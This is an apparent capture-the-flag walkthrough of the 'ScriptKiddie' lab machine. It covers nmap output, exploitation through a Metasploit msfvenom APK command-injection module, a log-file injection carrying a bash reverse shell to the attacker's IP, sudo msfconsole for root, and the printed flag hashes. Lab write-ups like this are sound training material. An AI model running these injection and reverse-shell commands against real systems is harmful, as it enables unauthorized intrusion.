SCRIPT KIDDIE
Enumeration;
Nmap
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
| 256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_ 256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-title: k1d'5 h4ck3r t00l5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Usual Port 80 is Not there so port 5000 is our Entry point lets check:)
Here is the we view 10.10.10.226:5000
Exploitation
after some google search this is vulnerable to
Rapid7 Metasploit Framework msfvenom APK Template Command Injection check it
its prety easy Exploit Before use this module Update your Metasploit
msfupdate ----> use this command
STEPS:
1: sudo msfconsole
2: use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
3: set lhost 10.10.14.xx
4: set lport 9001
5: set rhost 10.10.10.226
6: set rport 5000
7: exploit
mv /root/.msf4/local/msf.apk . move apk file to current directory
Upload msf.apk in 10.10.10.26:5000
Make Sure Change the Os to android
USER FLAG
BOOOM!! We get reverse shell lol its peice of cake
kid@scriptkiddie:~$ cd /
cd /
kid@scriptkiddie:/$ cd home
cd home
kid@scriptkiddie:/home$ ls
ls
kid pwn
kid@scriptkiddie:/home$ cd kid
cd kid
kid@scriptkiddie:~$ cat user.txt
cat user.txt
0e4b318e4bd0405bc1ecbd22db500867
kid@scriptkiddie:~$
HORIZONTOL PRIVILLEGE ESCALATION
kid@scriptkiddie:/home/pwn$ ls
ls
recon scanlosers.sh
kid@scriptkiddie:/home/pwn$ cat scanlosers.sh
cat scanlosers.sh
#!/bin/bash
log=/home/kid/logs/hackers
cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done
if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi
move 'pwn' user cat scanlosers.sh file it interstring bash script
lets move to the log in kid directory
copy this simple command :)
echo “ ;/bin/bash -c ‘bash -i >& /dev/tcp/10.10.14.XX/1234 0>&1’ #” >> hackers
Be Sure Change IP And start listen on local machine
some times this not work so try 4 or 5 times
Yep!! We got Pwn User
ROOT FLAG
Copy This Command :)
1: sudo -l
2: sudo msfconsole /bin/bash -p
3: id
4: cat root.txt
5: f5482d18d0acd025b5e86f11d568fd83
Post a Comment